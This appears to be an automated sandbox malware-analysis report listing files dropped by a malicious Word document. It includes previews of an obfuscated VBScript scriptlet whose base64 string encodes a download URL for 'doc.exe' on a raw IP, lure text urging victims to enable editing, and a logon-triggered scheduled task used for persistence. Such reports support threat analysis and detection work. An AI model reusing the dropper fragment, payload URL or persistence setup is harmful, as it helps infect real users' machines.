Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ra..............0..............&... ...@....@.. ....................... ............@..................................&..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B.................&......H........@...................@...........................................0...........r...p.+....0...........r+..p.+....0..................+..".(.....^..}.....(.......(.........0.............+.s....(.......X.......-.....0..+.........,..{.......+....,...{....o........(.......0..1.........s....}.....(......{.... .....3s....o .....{....rA..po!.....{.....K..s"...o#.....{.....o$.....{....rA..po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(....~....rQ..p(.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\160C60F1.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	370 sysV pure executable
Category:	dropped
Size (bytes):	262160
Entropy (8bit):	0.0018490830516166626
Encrypted:	false
SSDEEP:	3:DlSl/GGjn8+l2eJ/tFLl:DlSESndl
MD5:	017A2103FB6E7EA2AF2AC872DE82208C
SHA1:	4B6610CF14AD74F5E90783F68D822F1C35F8178A
SHA-256:	7E7BE6F128A7FEC4FB24865FF8263CB5FAF58D2D27128AED945B071A966F681E
SHA-512:	553ADCADB1C22B9444070C62802B4D59D74CA9CE3D167DE5FED19205E608C28B17A76864AED6415FEE0B3ADE133336A171C213F52ADB8EC409E35859C8F8DC37
Malicious:	false
Preview:	X.9..... .b.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84C9F23E.wmf Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
Category:	dropped
Size (bytes):	3730
Entropy (8bit):	5.026807168777447
Encrypted:	false
SSDEEP:	48:vWik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fg:vk7Hgwj+mbYf3LSrhlOs0f5aSdHn63D4
MD5:	D7E750614DEB7AF85FA5A66BC4C0372F
SHA1:	A33BEA9DA99C11D46A540B9268A93EE6D2453610
SHA-256:	C9DF431576EEF442F761A4CC1A2AD6EB331F4CF132A2528460D21574C4583886
SHA-512:	D4D72A6A95752407507771C667DB1A475137A1D4886DCE42219D840C0A86CB9D9BEDB2EB8A259386054FA412734AB951F3626630E4421A2C698E8B2EBDFBE0A3
Malicious:	false
Preview:	..................................5...........................Segoe UI....C.-.....@.........._....-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{023FDC9E-1C42-46A7-9085-716C914A6086}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3F2A7B0C-5922-426F-95EB-087369317B68}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.355309574382354
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbM:IiiiiiiiiifdLloZQc8++lsJe1Mztl/n
MD5:	18FDD179724248D1D2912EDBF4FB51B1
SHA1:	89C91C65684E4D2303DBA1D619F6FAED974CDB7D
SHA-256:	52FFB34F93DD28CB9300E577FB9935C29FD7C2B640B2FA02488F9C2A9854E31D
SHA-512:	D0A1B1F87CA9912EB8B9141C4ABB02985CD98EAC8F8DF624F835584624A3FFC31C35E999395DB78DDD015E4C3A55414099A9385A62C9887506540466603F9262
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C6B73EA-9387-4E02-9B96-A36EA329C5C4}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	44618
Entropy (8bit):	2.916419264398738
Encrypted:	false
SSDEEP:	768:R6/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:aFia0Dqeb0nstw29rVzWSgm58F
MD5:	506667FCE71121736C27BA0BF079EBAA
SHA1:	2A3C5545B148F7D94CFE34BB5A40652ED445AF78
SHA-256:	A4B8E6EAAFD665DE327FAEE4894504314E05D7F7556604B084FE77A74A745702
SHA-512:	E2378E62C992FF360F70CD094F1734D49F55F9A3542D83D913F36F4535A292A1B4A3F2996E81326EE7B5B753051595CD26F5F546E54D7106CF556915ED5F53A1
Malicious:	false
Preview:	c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.e.g.h.D.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j...d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.

C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	171404
Entropy (8bit):	4.423261254047836
Encrypted:	false
SSDEEP:	384:pAayMzzacasapa2hb04gQmU38Nl6UnRJbtqEEE6oEaE35n0:2azzacasapa2G4gQ538Nl6Un7ZFPW1p0
MD5:	8E17238688D177980DF980776169FCF2
SHA1:	C43A0581DDD877CDC5D066067A7489497DB8B282
SHA-256:	3B3E99D32E8913D3BDC94907F3FC39D08A8396B9AA15D982B55024327F598B92
SHA-512:	5AE07477E79BB29F11BEA579A13C2F0C3327E069039A6CDECD3FEF23D6E8E7803DA32842D0C69CCF6B2280787AEBFC92AB905104637696EE144ED84999ED678E
Malicious:	true
Preview:	Radio. U+262D Radioactive Sign U+2622 .active Sign U+2622 .. . U+262D Radioactive Sig..<scriptleT.. >. . U+262D Radioactive Sign U+2622 .U+262D Radio. U+262D Radioactive Sign U+2622 .active Sign U+2622 .... . U+262D Radioactive Sign U+2622 .U+262D Radio. U+262D Radioactive Sign U+2622 .active Sign U+2622 ...<script language = 'vbs'>..fsdfdsfs = "aHR0UDovLzEzLjkyLjEwMC4yMDgvZG9jL2RvYy5leGU=" '9vnw9r..yulkytjtrhtjrkdsarjky ="ZG9jLmV4ZQ==" '9vnw9r....veuifeig23e02i3r029u4r43j89uotjf893jt = "243242323453567/2289574543+34586893247232785634875436/25675476247-27687567-96765763-35676486484+3689356348756347856"..veuifeig23e02i3r029u4r43j89uotjf893jt = "243242323453567/2289574543+34586893247232785634875436/25675476247-27687567-96765763-35676486484+3689356348756347856"..veuifeig23e02i3r029u4r43j89uotjf893jt = "243242323453567/2289574543+34586893247232785634875436/25675476247-27687567-96765763-35676486484+3689356348756347856"..veuifeig23e02i3r

C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT:Zone.Identifier Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	3.9582291686698787
Encrypted:	false
SSDEEP:	3:gAWY3W:qY3W
MD5:	833C0EFD3064048FD6A71565CA115CCD
SHA1:	0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
SHA-256:	4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
SHA-512:	536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
Malicious:	false
Preview:	[ZoneTransfer]..ZoneId=3..3

C:\Users\user\AppData\Local\Temp\tmp2C00.tmp Download File
Process:	C:\Users\user\AppData\Roaming\doc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1620
Entropy (8bit):	5.142495643044382
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBstn:cbhZ7ClNQi/rydbz9I3YODOLNdq3g
MD5:	A9DD7D1E6E9610571B7272E800118317
SHA1:	201D2D07ED30CD502C49FB7A7B394B3DD2AC5DA0
SHA-256:	CA79D29A83423D0A363CDC7E5ADDA4ABB149ED0014CB364F1E4301901FDE99D4
SHA-512:	68A4055A2A5BFFE421B0C3B77F3D33DAAD692AE62FB28A35E0605AA4AFD87A4D09B92256A9F2FADEA3394B8B5122B7D8853D8EA6C123FEEFD30DAEDE7E1B5EB9
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\catalogue_2021_samples_list_revise_ol.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Sep 29 03:17:20 2021, length=548674, window=hide
Category:	dropped
Size (bytes):	2298
Entropy (8bit):	4.542840084257542
Encrypted:	false
SSDEEP:	48:8N/XTAZ+lyM638plyl5yYy52N/XTAZ+lyM638plyl5yYyX:8N/Xsf3X5yYy52N/Xsf3X5yYyX
MD5:	DCF53F1D846D774043C5E1AA602BE23C
SHA1:	42B7A998F530A33540AF200690E03ADF7203CB38
SHA-256:	DB5022C4C42607BAE923A9E960AD487ABEFDBE671E66B23DA166F82D1F69D5FE
SHA-512:	D790690D7EF647576417F0F20F9B95D65CD7F72A48CA88863553B42B5E8DF381DBDFFFAC00FFB98C4A8A14EE275605AE944511AF9D5C847F393E1BA41157C8A0
Malicious:	false
Preview:	L..................F.... ....D.?....D.?...^.,....B_...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!....&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S"...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.B_..=S+" .CATALO~1.DOC..........S ..S ..........................c.a.t.a.l.o.g.u.e._.2.0.2.1._.s.a.m.p.l.e.s._.l.i.s.t._.r.e.v.i.s.e._.o.l...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\catalogue_2021_samples_list_revise_ol.doc.@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.t.a.l.o.g.u.e._.2.0.2.1._.s.a.m.p.l.e.s._.l.i.s.t._.r.e.v.i.s.e._.o.l...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	4.533812779256457
Encrypted:	false
SSDEEP:	3:M1TR6QA8VXjUVJWCWR6X2vSd6leJrQA8VXjUVJWCWR6X2vSd6lmX1TR6QA8VXjUM:MfdUVk+G6LOdUVk+G6hdUVk+G6C
MD5:	63A62ECACBB279B739D76DE8BC290735
SHA1:	DC88C6A95984619248B35D2649A2C0CA869E3468
SHA-256:	95631AA3E299E5D22D89FB39BBBCFA22A3772765421821F3049BDF2A21CBD064
SHA-512:	2535EE7BEC9946D317F53F207699189CC05993DD42064E9C3CF6942729212BE26A1340220DCDC1F3E6151D5211BBC579D874F62E0267F80706356F72CF41FF5A
Malicious:	false
Preview:	[doc]..catalogue_2021_samples_list_revise_ol.LNK=0..catalogue_2021_samples_list_revise_ol.LNK=0..[doc]..catalogue_2021_samples_list_revise_ol.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5832864194691743
Encrypted:	false
SSDEEP:	96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
MD5:	7F8ED39C9E9D7119109A23D3E57D2D6D
SHA1:	423280C4D9C5EFB94129E31342C0201677121743
SHA-256:	5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
SHA-512:	35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2- (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5832864194691743
Encrypted:	false
SSDEEP:	96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
MD5:	7F8ED39C9E9D7119109A23D3E57D2D6D
SHA1:	423280C4D9C5EFB94129E31342C0201677121743
SHA-256:	5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
SHA-512:	35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msk (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5832864194691743
Encrypted:	false
SSDEEP:	96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
MD5:	7F8ED39C9E9D7119109A23D3E57D2D6D
SHA1:	423280C4D9C5EFB94129E31342C0201677121743
SHA-256:	5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
SHA-512:	35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7T64VM0QKZYD09V16F0X.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5832864194691743
Encrypted:	false
SSDEEP:	96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
MD5:	7F8ED39C9E9D7119109A23D3E57D2D6D
SHA1:	423280C4D9C5EFB94129E31342C0201677121743
SHA-256:	5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
SHA-512:	35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AEIVZJ3XSV20N2BPRI8G.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5832864194691743
Encrypted:	false
SSDEEP:	96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
MD5:	7F8ED39C9E9D7119109A23D3E57D2D6D
SHA1:	423280C4D9C5EFB94129E31342C0201677121743
SHA-256:	5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
SHA-512:	35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KALU1MUBXB5ZLB042YQK.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5832864194691743
Encrypted:	false
SSDEEP:	96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
MD5:	7F8ED39C9E9D7119109A23D3E57D2D6D
SHA1:	423280C4D9C5EFB94129E31342C0201677121743
SHA-256:	5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
SHA-512:	35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S"....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\doc.exe Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	637440
Entropy (8bit):	6.333867454868441
Encrypted:	false
SSDEEP:	12288:JA9Ni+hBr7IUA4S8vxou4AqcUkhPXuFJ:i9Ni+hBr8UAcZtIQXQ
MD5:	D8BC91E846E3D624814D4557681F33AD
SHA1:	873F451438EFCE56D2BCE9DD9B44BEEFB2C6A28B
SHA-256:	30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
